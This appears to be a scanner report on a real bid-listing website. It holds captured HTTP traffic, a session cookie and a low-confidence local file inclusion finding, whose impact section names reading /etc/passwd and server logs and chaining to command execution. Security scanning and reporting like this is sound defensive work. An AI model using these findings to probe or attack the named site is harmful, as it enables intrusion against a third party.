Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:01:45 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:45 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3464
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>QUESTCDN: Providers List</title> <script type="text/javascript" language="javascript"> function tzTest() { return; var rightNow = new Date(); var jan1 = new Date(rightNow.getFullYear(), 0, 1, 0, 0, 0, 0); var temp = jan1.toUTCString(); var jan2 = new Date(temp.substring(0, temp.lastIndexOf(" ")-1)); var std_time_offset = (jan1 - jan2) / (1000 * 60 * 60); var june1 = new Date(rightNow.getFullYear(), 6, 1, 0, 0, 0, 0); temp = june1.toUTCString(); var june2 = new Date(temp.substring(0, temp.lastIndexOf(" ")-1)); var daylight_time_offset = (june1 - june2) / (1000 * 60 * 60); var dst; if (std_time_offset == daylight_time_offset) dst = "0"; // daylight savings time is NOT observed else dst = "1"; // daylight savings time is observed var msg = ""; msg += "rightNow: " + rightNow + "\r\n"; msg += "std_time_offset: " + std_time_offset + "\r\n"; msg += "jan1: " + jan1 + "\r\n"; msg += "jan2: " + jan2 + "\r\n"; msg += "jan GMT: " + jan1.toGMTString() + "\r\n"; msg += "jan UTC: " + jan1.toUTCString() + "\r\n"; msg += "\r\n"; msg += "daylight_time_offset: " + daylight_time_offset + "\r\n"; msg += "jun1: " + june1 + "\r\n"; msg += "jun2: " + june2 + "\r\n"; msg += "jun GMT: " + june1.toGMTString() + "\r\n"; msg += "jun UTC: " + june1.toUTCString() + "\r\n"; msg += "dst: " + dst + "\r\n"; msg += "jan tzOffset: " + jan1.getTimezoneOffset() + "\r\n"; msg += "jun tzOffset: " + june1.getTimezoneOffset() + "\r\n"; msg += "Now tzOffset: " + rightNow.getTimezoneOffset() + "\r\n"; alert(msg); } </script> </head> <body> <form name="userdata" action="/qap/action/l2Login" method="POST"> <input type="hidden" name="loginPagePath" value="index.html"/> <table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"> <tr> <td style="width:100%;height:100%" valign="top"> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table> <tr> <td style="width:100">username:</td> <td><input type="text" name="username" size="24"/></td> </tr> <tr> <td>password:</td> <td><input type="password" name="password" size="24"/></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"/></td> </tr> </table> </td> </tr> </table> </form> <script type="text/javascript"> tzTest(); </script> </body></html>
Date: Tue, 01 Mar 2011 20:01:45 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:45 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3464
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>QUESTCDN: Providers List</title> <script type="text/javascript" language="javascript"> function tzTest() { return; var rightNow = new Date(); var jan1 = new Date(rightNow.getFullYear(), 0, 1, 0, 0, 0, 0); var temp = jan1.toUTCString(); var jan2 = new Date(temp.substring(0, temp.lastIndexOf(" ")-1)); var std_time_offset = (jan1 - jan2) / (1000 * 60 * 60); var june1 = new Date(rightNow.getFullYear(), 6, 1, 0, 0, 0, 0); temp = june1.toUTCString(); var june2 = new Date(temp.substring(0, temp.lastIndexOf(" ")-1)); var daylight_time_offset = (june1 - june2) / (1000 * 60 * 60); var dst; if (std_time_offset == daylight_time_offset) dst = "0"; // daylight savings time is NOT observed else dst = "1"; // daylight savings time is observed var msg = ""; msg += "rightNow: " + rightNow + "\r\n"; msg += "std_time_offset: " + std_time_offset + "\r\n"; msg += "jan1: " + jan1 + "\r\n"; msg += "jan2: " + jan2 + "\r\n"; msg += "jan GMT: " + jan1.toGMTString() + "\r\n"; msg += "jan UTC: " + jan1.toUTCString() + "\r\n"; msg += "\r\n"; msg += "daylight_time_offset: " + daylight_time_offset + "\r\n"; msg += "jun1: " + june1 + "\r\n"; msg += "jun2: " + june2 + "\r\n"; msg += "jun GMT: " + june1.toGMTString() + "\r\n"; msg += "jun UTC: " + june1.toUTCString() + "\r\n"; msg += "dst: " + dst + "\r\n"; msg += "jan tzOffset: " + jan1.getTimezoneOffset() + "\r\n"; msg += "jun tzOffset: " + june1.getTimezoneOffset() + "\r\n"; msg += "Now tzOffset: " + rightNow.getTimezoneOffset() + "\r\n"; alert(msg); } </script> </head> <body> <form name="userdata" action="/qap/action/l2Login" method="POST"> <input type="hidden" name="loginPagePath" value="index.html"/> <table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"> <tr> <td style="width:100%;height:100%" valign="top"> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table> <tr> <td style="width:100">username:</td> <td><input type="text" name="username" size="24"/></td> </tr> <tr> <td>password:</td> <td><input type="password" name="password" size="24"/></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"/></td> </tr> </table> </td> </tr> </table> </form> <script type="text/javascript"> tzTest(); </script> </body></html>
[Low Possibility] Local File Inclusion
[Low Possibility] Local File Inclusion
1
TOTAL
IMPORTANT
A Local File Inclusion (LFI) vulnerability occurs when a file from the target system is injected into attacked server page.
Impact
Impact can differ based on the exploitation and the read permission of the web server user. Depends on these factors an attacker might carry out one or more of the following attacks:
- Gather usernames via
/etc/passwordfile - Harvest useful information from the log files such as
"/apache/logs/error.log"or"/apache/logs/access.log" - Remotely execute commands via combining this vulnerability with some of other attack vectors such as file upload vulnerability or log injection.
Remedy
- If it's possible, do not accept appending file paths directly. Make it hard-coded or selectable from a limited hard-coded path list via an index variable
- If you definitely need dynamic path concatenation, ensure that you only accept required characters such as "a-Z0-9" and do not allow "..", "/", "%00" (null byte) or any other similar unexpected characters.
- Finally it's important to limit the API to allow inclusion only from a directory and directories below it. This way you can ensure that any potential attack can not perform a directory traversal attack.
|
- /qap/projects/prj_browse/ipp_prj_view.html
/qap/projects/prj_browse/ipp_prj_view.html |
Request
GET /qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=ipp_prj_view.html&group=11&provider=765295&jobPK=3 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:03:14 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:03:14 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 21369
Content-Type: text/html;charset=utf-8
<script language="javascript1.1">function DownloadBidTab(sjobNbr){ req_window = window.open ("/qap/projects/prj_browse/prj_download_bid_tab.html?job_no=" + sjobNbr,"","height=300,width=500");}function ShowViewResults(jobPK){ var w = window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group=11&provider=765295&jobPK=' + jobPK, 'ViewResults', 'status,resizable,scrollbars,width=700,height=600'); w.focus();}function PrintPage(){ window.print();}</script><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> </table> </td></tr><tr> <td width="100%" height="100%"> <table width="100%" height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="results_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="10"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="40"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="170"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">06/30/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1216224')">Shawnee County Project S-841001.00 - E. 6th Street Concrete Pavement Joint Repair (#1216224)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">Shawnee County Project S-841001.00 - E. 6th Street Concrete Pavement Joint Repair (#1216224)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">07/08/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1220929')">PWSD No. 1 Lafayette County, Mo - Contract 2: Transmission Line (#1220929)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">PWSD No. 1 Lafayette County, Mo - Contract 2: Transmission Line (#1220929)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">07/09/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1216287')">City of Topeka - Southwest Interceptor Sewer Project No. T-401009-00 (HTE No. 409650) (#1216287)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">City of Topeka - Southwest Interceptor Sewer Project No. T-401009-00 (HTE No. 409650) (#1216287)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">07/13/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1239802')">Standing Rock Rural Water System: Raw Water Pipeline Phase 2, Contract 3-4 (#1239802)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">Standing Rock Rural Water System: Raw Water Pipeline Phase 2, Contract 3-4 (#1239802)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">07/28/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1247812')">Standing Rock Rural Water System: Facility Removal & Restoration Project (#1247812)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">Standing Rock Rural Water System: Facility Removal & Restoration Project (#1247812)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">08/02/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1267448')">City of Oak Grove, Mo: SE 4th Street Improvements Project No. 2010-05 (#1267448)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">City of Oak Grove, Mo: SE 4th Street Improvements Project No. 2010-05 (#1267448)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">08/19/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1263009')">OMND Regional Service Area, OMND WTP Building & Equipment Installation, Contract 3-1D (#1263009)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">OMND Regional Service Area, OMND WTP Building & Equipment Installation, Contract 3-1D (#1263009)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">08/25/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1282800')">City of Oak Grove: SW 12th St/Curs - Street, Water & Storm Sewer Improvements Project No. 2010-04 (#1282800)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">City of Oak Grove: SW 12th St/Curs - Street, Water & Storm Sewer Improvements Project No. 2010-04 (#1282800)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">08/25/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1282789')">City of Oak Grove: SW 5th Street - Street, Water & Storm Sewer Improvements Project No. 2009-02 (#1282789)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">City of Oak Grove: SW 5th Street - Street, Water & Storm Sewer Improvements Project No. 2009-02 (#1282789)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">08/30/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1290346')">Pottawatomie County, KS: Roadway Improvement Project 14658-101, Green Valley Road (#1290346)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">Pottawatomie County, KS: Roadway Improvement Project 14658-101, Green Valley Road (#1290346)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">09/16/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1300647')">SCWD - Emmons County WTP Building and Equipment Installation Contract 2010-7 (#1300647)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">SCWD - Emmons County WTP Building and Equipment Installation Contract 2010-7 (#1300647)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">10/07/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1334336')">2010 Sanitary Sewer Rehabilitation Project - St. Charles, Iowa (#1334336)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">2010 Sanitary Sewer Rehabilitation Project - St. Charles, Iowa (#1334336)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">10/14/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1342806')">New Pump Station No. 2 & Pipeline Installation - Warren Water District (#1342806)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">New Pump Station No. 2 & Pipeline Installation - Warren Water District (#1342806)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">10/18/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1343309')">Water Service to Bowling Green & Wellsville: Water Distribution System (#1343309)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">Water Service to Bowling Green & Wellsville: Water Distribution System (#1343309)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">10/26/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1351825')">SCWD - Phase 2 North Burleigh WTP Equipment Installation, Contract 2010-6 (#1351825)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" ..
Date: Tue, 01 Mar 2011 20:03:14 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:03:14 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 21369
Content-Type: text/html;charset=utf-8
<script language="javascript1.1">function DownloadBidTab(sjobNbr){ req_window = window.open ("/qap/projects/prj_browse/prj_download_bid_tab.html?job_no=" + sjobNbr,"","height=300,width=500");}function ShowViewResults(jobPK){ var w = window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group=11&provider=765295&jobPK=' + jobPK, 'ViewResults', 'status,resizable,scrollbars,width=700,height=600'); w.focus();}function PrintPage(){ window.print();}</script><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> </table> </td></tr><tr> <td width="100%" height="100%"> <table width="100%" height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="results_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="10"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="40"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="170"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">06/30/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1216224')">Shawnee County Project S-841001.00 - E. 6th Street Concrete Pavement Joint Repair (#1216224)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">Shawnee County Project S-841001.00 - E. 6th Street Concrete Pavement Joint Repair (#1216224)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">07/08/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1220929')">PWSD No. 1 Lafayette County, Mo - Contract 2: Transmission Line (#1220929)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">PWSD No. 1 Lafayette County, Mo - Contract 2: Transmission Line (#1220929)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">07/09/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1216287')">City of Topeka - Southwest Interceptor Sewer Project No. T-401009-00 (HTE No. 409650) (#1216287)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">City of Topeka - Southwest Interceptor Sewer Project No. T-401009-00 (HTE No. 409650) (#1216287)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">07/13/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1239802')">Standing Rock Rural Water System: Raw Water Pipeline Phase 2, Contract 3-4 (#1239802)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">Standing Rock Rural Water System: Raw Water Pipeline Phase 2, Contract 3-4 (#1239802)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">07/28/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1247812')">Standing Rock Rural Water System: Facility Removal & Restoration Project (#1247812)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">Standing Rock Rural Water System: Facility Removal & Restoration Project (#1247812)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">08/02/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1267448')">City of Oak Grove, Mo: SE 4th Street Improvements Project No. 2010-05 (#1267448)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">City of Oak Grove, Mo: SE 4th Street Improvements Project No. 2010-05 (#1267448)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">08/19/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1263009')">OMND Regional Service Area, OMND WTP Building & Equipment Installation, Contract 3-1D (#1263009)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">OMND Regional Service Area, OMND WTP Building & Equipment Installation, Contract 3-1D (#1263009)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">08/25/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1282800')">City of Oak Grove: SW 12th St/Curs - Street, Water & Storm Sewer Improvements Project No. 2010-04 (#1282800)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">City of Oak Grove: SW 12th St/Curs - Street, Water & Storm Sewer Improvements Project No. 2010-04 (#1282800)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">08/25/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1282789')">City of Oak Grove: SW 5th Street - Street, Water & Storm Sewer Improvements Project No. 2009-02 (#1282789)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">City of Oak Grove: SW 5th Street - Street, Water & Storm Sewer Improvements Project No. 2009-02 (#1282789)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">08/30/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1290346')">Pottawatomie County, KS: Roadway Improvement Project 14658-101, Green Valley Road (#1290346)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">Pottawatomie County, KS: Roadway Improvement Project 14658-101, Green Valley Road (#1290346)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">09/16/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1300647')">SCWD - Emmons County WTP Building and Equipment Installation Contract 2010-7 (#1300647)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">SCWD - Emmons County WTP Building and Equipment Installation Contract 2010-7 (#1300647)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">10/07/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1334336')">2010 Sanitary Sewer Rehabilitation Project - St. Charles, Iowa (#1334336)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">2010 Sanitary Sewer Rehabilitation Project - St. Charles, Iowa (#1334336)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">10/14/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" 